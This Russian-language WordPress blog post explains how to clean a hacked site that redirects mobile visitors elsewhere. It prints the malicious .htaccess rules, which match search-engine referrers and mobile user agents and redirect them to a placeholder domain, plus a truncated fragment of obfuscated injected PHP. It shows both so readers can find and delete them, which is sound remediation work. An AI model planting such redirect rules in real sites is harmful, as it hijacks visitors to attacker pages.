Внимание! Вирус! На мобильном устройстве вместо блога открывается другой сайт.

  Автор:
  5341
Как защитить компьютер от вирусов

«Вместо моего блога на сотовом телефоне  открывается чужой сайт». На днях с такой проблемой ко мне обратился клиент. Это уже не первый случай, поэтому решила описать ситуацию на блоге.

Для начала давайте протестуем Ваш блог. Попробуйте открыть свой блог на любом мобильном устройстве:  Iphone, ipad, android. Если вместо Вашего блога появится неизвестный сайт — время бить тревогу. Скорее всего Ваш блог был взломан, и злоумышленники изменили файл .htaccess, прописали в нем свои правила перенаправления.

Как это исправить?

Необходимо зайти на хостинг в корневую папку блога, скачать файл .htaccess или открыть его для редактирования прямо на хостинге.

Содержание это файла должно выглядеть так (при условии, что Вы не используете кэширующий плагин или плагин защиты Better Security):


# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

Если после этого кода или вместо него в Вашем файле будут еще  коды типа:


RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*i:midp|samsung|nokia|j2me|avant|docomo|novarra|palmos|palmsource|opwv|chtml|pda|mmp|blackberry|mib|symbian|wireless|nokia|hand|mobi|phone|cdm|upb|audio|SIE|SEC|samsung|HTC|mot-|mitsu|sagem|sony|alcatel|lg|eric|vx|NEC|philips|mmm|xx|panasonic|sharp|wap|sch|rover|pocket|benq|ja

RewriteRule ^(.*)$ http://сайт-куда-идет-перенаправление.ru/index.php [R=301,L]

Их нужно просто удалить.

Далее сохраните файл и загрузите его обратно на хостинг. Проверьте как теперь открывается блог на мобильном устройстве.

Шаг 1 — Проверить и удалить все лишние файлы .htaccess

Но это еще не все. Проверьте все папки на наличие файла .htaccess и его содержимое. Злоумышленники могли таже и в них прописать данный код. Папки для проверки (wp-include, wp-admin, wp-content). Если Вы найдете в этих папках файл .htaccess просто его удалите.

Шаг 3 — найти и почистить зараженные файлы

И наконец необходимо найти взломаный файл в который вставили код для геренации перенаправления в файле .htaccess. Самые уязвимые файлы это index.php, header.php, footer.php и functions.php в папке папке с темой. Код может выглядеть так (Публикую только часть кода. Как правило код очень длинный. Расшифровать его можно в программе php decoder — http://www.unphp.net/.)

<?php
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["ijv\x64cn\x78y\x69\x66\x70"]="ip\x73";${"\x47\x4cO\x42\x41L\x53"}["j\x6bp\x6dym\x6by"]="\x69\x70";${"GLOB\x41\x4c\x53"}["\x70\x76\x70\x79jic\x6ao\x7a\x6d"]="\x72\x65\x66\x65\x72e\x72";${"G\x4c\x4f\x42\x41\x4cS"}
?>

Его необходимо удалить из всех зараженных файлов (или заменить эти файлы на чистые).

Как это сделать:
1. скачайте архив с блогом на свой компьютер по FTP
2. откройте зараженный файл который Вы нашли на хостинге
3. скопируте код ( или часть кода ) вируса и через поиск найдите все зараженные файлы.
4. удалите вредоносный код
5. закачайте исправленные файлы снова на хостинг (или просто закачайте чистые файлы — предварительно скачайте WordPress на компьютер)

Кстати, иногда бывает, что злоумышленник создает файлы которые не существуют в WordPress. В таком случае, если Вы видите зараженный файл, которого не должно быть в WordPress, можете просто его удалить.

Если Вам сложно самостоятельно решить эту проблему, Вы всегда можете обратиться в тех. поддержку проекта «МЛМ Блог за 1 Час» по скайпу: mlmproekt.ru.

Как защитить блог от взлома

Чтобы подобного не происходило с Вашим блогом небходимо соблюдать некоторые правила:

1. Вовремя обновляйте WordPress до новой версии

2. Обновляйте плагины до новой версии

3. Обновляйте шаблон до новой версии

4. Не устанавливайте на блог не проверенные плагины и скрипты

5. Проверьте Ваш компьютер на вирусы

6. Периодически меняйте пароли к админке блога, панеле управления хостинга, FTP

7. Придумывайте сложные пароли

8. Используйте плагин по защите блога от взлома Better Security 

Если у Вас были подобные случаи с блогом, поделитесь ими, пожалуйста, в комментариях.

Успешного блогинга!

Внимание! Вирус! На мобильном устройстве вместо блога открывается другой сайт.

   4 голоса
Средняя оценка: 5 из 5
Вы находите данную статью полезной или интересной? Поделитесь ею, пожалуйста, с другими - просто нажмите на кнопки ниже:
Пошаговый План По Созданию Бизнес-Блога На WordPress
Оставьте свой комментарий:
19 комментариев
  1. Добрый день, Анфиса! У меня тоже появилась проблема с мобильной версией сайта, но она несколько иная. Суть проблемы: после удаления всего кэша в плагине Super Cache сайт почему-то начал отображаться одновременно одинаково на компьютере и на мобильном устройстве (либо в обычном, либо в мобильном виде. С каждым удалением кэша меняется вид отображения сайта). Super Cache работает с WPTouch. В течение нескольких лет все работало нормально. Техподдержка хостинга не справилась с этой проблемой. Надеюсь на Вас, Анфиса!

    • Добрый день, Сергей! Не могу подсказать, поскольку уже давно блог сделан на шаблоне AB-Inspriation, а он адаптирован под мобильные устройства. Я бы на вашем месте поменяла шаблон и не мучилась с плагином. Сейчас уже многие современные шаблоны адаптированы под мобильные. Достойных шаблонов много как бесплатных так и платных. Можете воспользоваться нашим шаблоном AB-Inspiration. Он помимо того, что он адаптирован под мобильные устройства, в него встроены все необходимые элементы, такие как: кнопки поделиться, формы подписки, комментарии соц сетей, все необходимые виджеты соц. сетей, SEO оптимизирован, и сделана большая работа над SMO (оптимизация под соцмедиа). Шаблон настраивается по видеоинструкциям понятным даже новичкам. Входит в комплект «МЛМ блог за 1 час». Посмотреть можно здесь: https://wpplaza.ru/shop/kit/. Подходит абсолютно для любых тем: будь то млм или бизнес-блог или кулинария, путешествия, хобби, здоровье. Если есть вопросы по шаблону, не стесняйтесь задавайте. Буду рада помочь.

на Блоге
в Фейсбук
в Вконтакте